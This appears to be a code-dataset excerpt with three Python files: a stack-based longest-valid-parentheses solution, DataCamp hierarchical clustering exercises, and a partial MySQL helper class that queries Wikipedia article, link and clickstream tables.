a62a4cdde9814ae48997176debcaad537f7ad01f
|
[
"Apache-2.0"
] | 1
|
2021-09-02T12:05:15.000Z
|
2021-09-02T12:05:15.000Z
|
class Solution(object):
def longestValidParentheses(self, s):
"""
:type s: str
:rtype: int
"""
if s == "":
return 0
stack = []
max_len = 0
left = -1
for j in range(0, len(s)):
if s[j] == '(':
stack.append(j)
else:
if len(stack) == 0:
left = j
else:
stack.pop()
if len(stack) == 0:
max_len = max(max_len, j - left)
else:
max_len = max(max_len, j - stack[-1])
return max_len
s = Solution()
print s.longestValidParentheses("(()")
print s.longestValidParentheses(")()())")
print s.longestValidParentheses("())")
print s.longestValidParentheses(")(((((()())()()))()(()))(")
print s.longestValidParentheses("()((())()")
print s.longestValidParentheses(
"(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((()())))(())()())((((()())((())))((()))()())))()(()()()(()((()))()()()))()()()(()()((((())()(((()(((())((()))()((()(()))()())))))))))())()())(()()))((()()()()())))((()()((((()()))))(())())()()))))(())()(()))((((((()))(()()()()(())(()((()))(()(())(((()()))(()((((()((((()((((())(())))()(())))()))(()((((((((())()()((())((()())()))))())())()(((((()()(((((())()((()(((()))(()(()))(()(()())))())(()((((()((()(((((()()))((()(()((())()))))(()(()())((()((()((((())))(()())()))()())())()))))(())))(())()((())(()(()))))()())(((()(()(((((((((()(()()())))((()((()())())())(((((()(()))))()))()))))()())()(()(())))(()))))(()))(((()))))())))))(((())((())((((()((()))((())))()))(((()))())()))()()()((()()(()())(()))()()((()())))))())(()())(((())))))())(())()))()())())(()(()((())((()(()((())(()()()(()((()(((()(())()(((())))))()())))))(()((((()(()()))(((())(()))(()()))))(())()((()))()))()()))()((())(()())())())(()))(()()(())()(()((((()())(((())(()()())())(()()))())))(()((())(()()))))(()))((()()((((()())(()()))()())()())))()(()((((())())()(())()))()()(()(()))))))(((()()((()))(()((((()()((())))())())))()())))())))((())()()()))()((()((()))()()())))(())())(()(()(()(()))())()))(())((())()())(((()()(((())(()()))(()())(())))()))(((()()()())))())))(((()))())())())))(((()))()())())())))))()()()()(())))(()())))(()()())))()((((()()()((((()))()())))(()))()))))(()())()))(((((())()((())()))(()())()()()())()(((()(()(())))))(()(((()()))((((()()))()))(((())(()(()))()(())))()()(()))))()))))()())))()))((((((((()()())((()(()()()(((())())())))()()(())(())))()())()())))((()))((((())()()))(())(((())(()()(((((()()((()()(((()(()()(((())()))))()(()())(()((((()()())(((()))(())((())()))))())))))(()()()())))()))(())((()())()())()()))(())))((()))()()((()())()()))(()()(())()())(())))((()(((())))()))))((((()))((())())())()(())(()))((((((())()()(((((()))()())(((()(()(())()((()())))(((())(()(())))))(()(()(((()))(())((((())))((())((((((((()(((((()(())))((((((())(()((((()(())()()((())())())((((((((()))))(((())()))()()))(())(())()()())(()()((())(()))())(((())(()((())(())(())))))(()(()(()()(((()()()))())(()))(())())()(((()((())((()())()(((((()()(()))))(((())()()))(()(()(()(()((())))))))(())())()))()(()(()))))()()((((())()())(((())(()))((()())(()((())()()(())((((())))))(())())())(())(()()(()()))(((()((((())(((())))))(()()()()(((()((((())(()))((())()))()(((((((()(()())))((()()(()()((())()))()(())))((()()((((()()()))((())()))((())(((()(()()()(((()((())((())()())())))((()))))))))))(())()()(((()()())))(((()))(()))))(((()(()())(()))(())((()))(((()(()()(((((((()())((((()))((((()(()())())()(((()(()((()))))))))))()()(((()()((((((((((())))))((((())())((()(((()())()))()()(((((())(()())())(((()((())((((((())(((())(((()(()(((((((()(())()())(()))))(()(((()))))))()))(((())))(()(()())()))(()()(()(()((()())()(())((()()((()()()(()(()()))(((((())()(()())()((()())()))(((((()((())()((()((((()(((())())(()()(())()(())(()(())))))(()())((()((()()()())(()))(()))))))(()((())(())((())()())()()))(()((()))(()()))()())(())(()()(()))((())()((())((((((())()(()()(((((())(()())())())()()(()())))))()))()((())((((((()())((()))))))((()(()()(((((((())))))))((()))(())(((()(()(())()()()()(()(())()))))))())()))()(((((()(())(((()))((()))()))()()(()(()((())(()))))()())((()())))))))(()()(()()))()((()(())()((())(()()))())((()())())()()))))((((()()()))())(())()())))()))()))))()))((()(()())()))()))(((()()()()())))())()))((()()())((()())))(((()((()()())(())))()(())(()(()(())(()(((((()()()(((())()())(()((()())(()(((()(())((((()())()(())))(((((((()))))())())))(()))()()(((()())(()))()())(())()))()((())()((())((()((())()())(()()))(((((()()()((((((((()(()((()()((((((()())))((((((())))())(()(()((((()(()())())()()))()((())())(()((((()(((()())((())))))(()())(()()()(()))()())()()))((()((()())(())()()()((())()()))))())()))())))(()))(()))()))((())()((()((()))))))())(((()))))))()(((()((())))((()())())()))((()(()(()(()))((()()))())))(()())))())(()))(())(())))))()(())(()()))()))((())))(()))(()))))(())()())(()(()))())(()(())(())))(()))())(()())))())(()())((()))()()((()(()()()(((((()((()((())(()())(())))()))))))(((())())))()((((()))()((()))())()))()))(()(()((()()())()()(((()))())))))()((((()()))))()))())))()())))(((((()(())))())(((()))((()))(((()(())())()((()(((()))()())))))((((()))()(()((((((()(()()()())(())((()))()(()()))))))()(((())))(())()())))))((()))(())()))))(()(((()()((())(()))))(((((()))))())))()(())(()(()))()))()))(()((())(()((()())()(((()))))())(())()(())))((())(()(((()))(((((()))(()))())))(()((((((())()((((())())()))((())))))())(()(())())))))()()(((())()())))))()))()())))()(())())(())()()()(((())))(())(((()))(()(((()()))())((()))(((()()()()())()()))(()))))()()))))(((()()))))()()(()()))()()()())())()((())(((()())(((())(()((()(((()(()())()()()(()((())(()()(()()()))))))()((()))))()(()))()))(())()()())))()()(((()))((()()(((()())))((()()())((())))))()())()((())))())(()())()()()()((())((()()())((()()))())(())())()(()(((()))())(()))))(()()))(())))))))()())()((()())()()))()())))((()()(()())()(()))((())()))(((())))())))(((()()())())(")
| 419.894737
| 15,007
| 0.026009
| 88
| 15,956
| 4.647727
| 0.306818
| 0.08802
| 0.425428
| 0.415648
| 0.503667
| 0.503667
| 0.425428
| 0.425428
| 0.425428
| 0.425428
| 0
| 0.00045
| 0.024254
| 15,956
| 37
| 15,008
| 431.243243
| 0.025821
| 0
| 0
| 0.178571
| 0
| 0
| 0.946412
| 0.945028
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.214286
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7d9eb04b823fa669743531484650c5f93bdb2d6f
| 4,017
|
py
|
Python
|
Machine Learning Scientist with Python Track/6. Cluster Analysis in Python/ch2_exercises.py
|
MuhammadAlBarham/datacamp
|
65c180163b1ad235c79d85d4926e586a15a5f78f
|
[
"MIT"
] | 7
|
2020-09-14T00:26:19.000Z
|
2022-02-08T20:53:52.000Z
|
Machine Learning Scientist with Python Track/6. Cluster Analysis in Python/ch2_exercises.py
|
MuhammadAlBarham/datacamp
|
65c180163b1ad235c79d85d4926e586a15a5f78f
|
[
"MIT"
] | null | null | null |
Machine Learning Scientist with Python Track/6. Cluster Analysis in Python/ch2_exercises.py
|
MuhammadAlBarham/datacamp
|
65c180163b1ad235c79d85d4926e586a15a5f78f
|
[
"MIT"
] | 8
|
2021-01-12T15:23:20.000Z
|
2022-03-17T12:06:00.000Z
|
# Exercise_1
# Import the fcluster and linkage functions
from scipy.cluster.hierarchy import fcluster, linkage
# Use the linkage() function
distance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method = 'ward', metric = 'euclidean')
# Assign cluster labels
comic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')
# Plot clusters
sns.scatterplot(x='x_scaled', y='y_scaled',
hue='cluster_labels', data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_2
# Import the fcluster and linkage functions
from scipy.cluster.hierarchy import fcluster, linkage
# Use the linkage() function
distance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method = 'single', metric = 'euclidean')
# Assign cluster labels
comic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion = 'maxclust')
# Plot clusters
sns.scatterplot(x='x_scaled', y='y_scaled',
hue='cluster_labels', data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_3
# Import the fcluster and linkage functions
from scipy.cluster.hierarchy import fcluster, linkage
# Use the linkage() function
distance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method ='complete', metric= 'euclidean')
# Assign cluster labels
comic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')
# Plot clusters
sns.scatterplot(x='x_scaled', y='y_scaled',
hue='cluster_labels', data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_4
# Import the pyplot class
from matplotlib import pyplot as plt
# Define a colors dictionary for clusters
colors = {1:'red', 2:'blue'}
# Plot a scatter plot
comic_con.plot.scatter(x = 'x_scaled',
y = 'y_scaled',
c = comic_con['cluster_labels'].apply(lambda x: colors[x]))
plt.show()
--------------------------------------------------
# Exercise_5
# Import the seaborn module
import seaborn as sns
# Plot a scatter plot using seaborn
sns.scatterplot(x='x_scaled',
y='y_scaled',
hue = 'cluster_labels',
data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_6
# Import the dendrogram function
from scipy.cluster.hierarchy import dendrogram
# Create a dendrogram
dn = dendrogram(distance_matrix)
# Display the dendogram
plt.show()
--------------------------------------------------
# Exercise_7
#1
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], method= 'ward')
#2
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], 'ward')
# Assign cluster labels to each row of data
fifa['cluster_labels'] = fcluster(distance_matrix, 3, criterion='maxclust')
#3
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], 'ward')
# Assign cluster labels to each row of data
fifa['cluster_labels'] = fcluster(distance_matrix, 3, criterion='maxclust')
# Display cluster centers of each cluster
print(fifa[['scaled_sliding_tackle', 'scaled_aggression', 'cluster_labels']].groupby('cluster_labels').mean())
#4
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], 'ward')
# Assign cluster labels to each row of data
fifa['cluster_labels'] = fcluster(distance_matrix, 3, criterion='maxclust')
# Display cluster centers of each cluster
print(fifa[['scaled_sliding_tackle', 'scaled_aggression', 'cluster_labels']].groupby('cluster_labels').mean())
# Create a scatter plot through seaborn
sns.scatterplot(x='scaled_sliding_tackle', y='scaled_aggression', hue='cluster_labels', data=fifa)
plt.show()
--------------------------------------------------
| 32.658537
| 110
| 0.66592
| 484
| 4,017
| 5.349174
| 0.177686
| 0.110467
| 0.02472
| 0.067207
| 0.793743
| 0.781769
| 0.775589
| 0.775589
| 0.775589
| 0.775589
| 0
| 0.005496
| 0.139408
| 4,017
| 122
| 111
| 32.92623
| 0.743419
| 0.268608
| 0
| 0.705882
| 0
| 0
| 0.253453
| 0.05076
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.117647
| null | null | 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
817edcb2ea1c45af36caf1b02c9ec8f9c60f7216
| 22,423
|
py
|
Python
|
parsingframework/wsd/database/mysqlworkview.py
|
linksuccess/linksuccess
|
88059db1d93de56d3b67771b7383f9570c78f49f
|
[
"MIT"
] | 6
|
2016-03-11T08:31:02.000Z
|
2020-06-25T14:12:47.000Z
|
parsingframework/wsd/database/mysqlworkview.py
|
linksuccess/linksuccess
|
88059db1d93de56d3b67771b7383f9570c78f49f
|
[
"MIT"
] | null | null | null |
parsingframework/wsd/database/mysqlworkview.py
|
linksuccess/linksuccess
|
88059db1d93de56d3b67771b7383f9570c78f49f
|
[
"MIT"
] | 1
|
2018-03-24T13:06:25.000Z
|
2018-03-24T13:06:25.000Z
|
import MySQLdb
import logging
class MySQLWorkView:
"""The MySQLWorkView class allows database access optimized to
retrieve disambiguation entries from the database
"""
def __init__(self, db_connection):
"""constructor
@param db_connector the database connector used to access the database
"""
self._db_connection = db_connection
self._cursor = db_connection.cursor()
self.reset_cache()
def __del__(self):
"""destructor
closes the database connection
"""
self._db_connection.close()
def reset_cache(self):
"""resets the internal cache and thus prevents it from growing too big
"""
self._redirect_cache = {}
self._link_cache = {}
self._article_cache = {}
self._occurrences_cache = {}
self._templates_cache = {}
def resolve_redirect(self, name):
"""resolves a redirect and returns the real article name
@param name the name of the redirect
@return the real name of the article or None if it cannot be resolved
"""
try:
self._cursor.execute('SELECT target_article_name FROM redirects WHERE source_article_name=%s;', (name,))
row = self._cursor.fetchone()
if row != None:
return row[0]
except MySQLdb.Error, e:
logging.error('error resolving redirect for name "%s": %s (%d)'
% (name.encode('ascii', 'ignore'), e.args[1], e.args[0]))
return None
def retrieve_number_of_common_articles(self, id1, id2):
"""computes the number of articles that link to both referenced articles
@param id1 the id of the first article to be linked to
@param id2 the id of the second article to be linked to
@return the number of articles that link to both referenced articles
"""
# retrieve from database and store in cache
try:
if id1 not in self._link_cache:
self._cursor.execute('SELECT source_article_id FROM links WHERE target_article_id=%s;', (id1,))
self._link_cache[id1] = self._cursor.fetchall()
if id2 not in self._link_cache:
self._cursor.execute('SELECT source_article_id FROM links WHERE target_article_id=%s;', (id2,))
self._link_cache[id2] = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error resolving links for source article id %d or %d: %s (%d)'
% (id1, id2, e.args[1], e.args[0]))
# find common articles
counter = 0
for source1 in self._link_cache[id1]:
for source2 in self._link_cache[id2]:
if source1 == source2:
counter += 1
return counter
def resolve_title(self, title):
"""resolves an article and returns it
@param title the title of the article
@return a dictionary with fields 'id' and 'title' or None if could not be resolved
"""
if title in self._article_cache:
return self._article_cache[title]
try:
t = title[0].upper() + title[1:]
self._cursor.execute('SELECT id, title FROM articles WHERE title=%s;', (t,))
row = self._cursor.fetchone()
if row == None:
self._cursor.execute(
'SELECT id, title FROM articles WHERE title=(SELECT target_article_name FROM redirects WHERE source_article_name=%s);',
(title,))
row = self._cursor.fetchone()
if row == None:
print t
self._article_cache[title] = None
else:
self._article_cache[title] = {'id': row[0], 'title': row[1]}
if (row[1] != title):
self._article_cache[row[1]] = {'id': row[0], 'title': row[1]}
except MySQLdb.Error, e:
logging.error('error resolving article "%s": %s (%d)'
% (title.encode('ascii', 'ignore'), e.args[1], e.args[0]))
if title in self._article_cache:
return self._article_cache[title]
return None
def retrieve_all_articles(self):
"""retrieves all articles. useful for crawling or making media wiki api requests
@return a list of dictionaries holding the following keys:
'id': the id of the retrieved article
'rev_id': the revision id of the retrieved article
'title': the title of the retrieved article
"""
articles = []
try:
#self._cursor.execute('SELECT * FROM articles WHERE RAND()<=0.0006 limit 1000;')
#self._cursor.execute('SELECT * FROM articles limit 1000;')
self._cursor.execute('SELECT * FROM articles;')
result = self._cursor.fetchall()
for row in result:
article = {}
article['id'] = row[0]
article['rev_id'] = row[1]
article['title'] = row[2]
articles.append(article)
except MySQLdb.Error, e:
logging.error('error retrieving 1000 random articles %s (%d)' % (e.args[1], e.args[0]))
return articles
def retrieve_all_articles_questionmark(self):
"""retrieves all articles. useful for crawling or making media wiki api requests
@return a list of dictionaries holding the following keys:
'id': the id of the retrieved article
'rev_id': the revision id of the retrieved article
'title': the title of the retrieved article
"""
articles = []
try:
#self._cursor.execute('SELECT * FROM articles WHERE RAND()<=0.0006 limit 1000;')
#self._cursor.execute('SELECT * FROM articles limit 1000;')
self._cursor.execute('SELECT * FROM articles WHERE title LIKE %s;', ("?%",))
result = self._cursor.fetchall()
for row in result:
article = {}
article['id'] = row[0]
article['rev_id'] = row[1]
article['title'] = row[2]
articles.append(article)
except MySQLdb.Error, e:
logging.error('error retrieving 1000 random articles %s (%d)' % (e.args[1], e.args[0]))
return articles
def retrieve_all_unique_links(self):
"""retrieves all links. These are the network edges
@return a list of dictionaries holding the following keys:
'from': the source article id
'to': the target article id
"""
links = []
try:
self._cursor.execute('SELECT * FROM unique_links;')
result = self._cursor.fetchall()
for row in result:
link = {}
link['from'] = row[0]
link['to'] = row[1]
links.append(link)
except MySQLdb.Error, e:
logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
return links
def retrieve_all_transitions(self):
"""retrieves all transitions from the wikipeida clickstream_derived that are an internal links. These are the network edges
@return a list of dictionaries holding the following keys:
'from': the source article id
'to': the target article id
"""
links = []
try:
self._cursor.execute('SELECT * FROM clickstream_derived WHERE link_type_derived LIKE %s AND NOT link_type_derived=%s;', ("internal%", "internal-nonexistent",))
result = self._cursor.fetchall()
for row in result:
link = {}
link['from'] = row[0]
link['to'] = row[1]
links.append(link)
except MySQLdb.Error, e:
logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
return links
def retrieve_all_internal_transitions(self):
"""retrieves all internal links transitions from the wikipeida clickstream_derived that are an internal links. These are the network edges
@return a list of dictionaries holding the following keys:
'from': the source article id
'to': the target article id
"""
links = []
try:
self._cursor.execute('SELECT * FROM clickstream_derived WHERE link_type_derived=%s;', ("internal-link",))
result = self._cursor.fetchall()
for row in result:
link = {}
link['from'] = row[0]
link['to'] = row[1]
links.append(link)
except MySQLdb.Error, e:
logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
return links
def retrieve_all_internal_transitions_counts(self):
"""retrieves all internal links transitions from the wikipeida clickstream_derived that are an internal links. These are the network edges
@return a list of dictionaries holding the following keys:
'from': the source article id
'to': the target article id
"""
links = []
try:
self._cursor.execute('SELECT * FROM clickstream_derived WHERE link_type_derived=%s;', ("internal-link",))
result = self._cursor.fetchall()
for row in result:
link = {}
link['from'] = row[0]
link['to'] = row[1]
link['counts']=row[2]
links.append(link)
except MySQLdb.Error, e:
logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
return links
def retrieve_all_links_coords(self):
"""retrieves all xy coord for all links in wikipeida.
@return a list of coords holding the following keys:
'source_article_id': the wikipedia article id
'x': x position on screen
'y': y position on screen
"""
coords = []
try:
self._cursor.execute('SELECT source_article_id, target_x_coord_1920_1080, target_y_coord_1920_1080 FROM links where target_x_coord_1920_1080 is not Null and target_y_coord_1920_1080 is not Null and target_x_coord_1920_1080!=0 and target_y_coord_1920_1080!=0 and source_article_id!=target_article_id;')
result = self._cursor.fetchall()
for row in result:
link = {}
link['source_article_id']= row[0]
link['x'] = row[1]
link['y'] = row[2]
coords.append(link)
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return coords
def retrieve_all_page_lengths(self):
"""retrieves all page lengths.
@return a dict of lengths holding the following keys:
'id': the lenght of the page with the id
"""
pages = {}
try:
self._cursor.execute('SELECT * FROM page_length;')
result = self._cursor.fetchall()
for row in result:
pages[row[0]]=row[1]
except MySQLdb.Error, e:
logging.error('error retrieving pagelength: %s (%d)' % (e.args[1], e.args[0]))
return pages
def retrieve_all_links_coords_clicks(self):
"""retrieves all xy coord for all links in wikipeida.
@return a list of coords holding the following keys:
'source_article_id': the wikipedia article id
'x': x position on screen
'y': y position on screen
"""
coords = []
try:
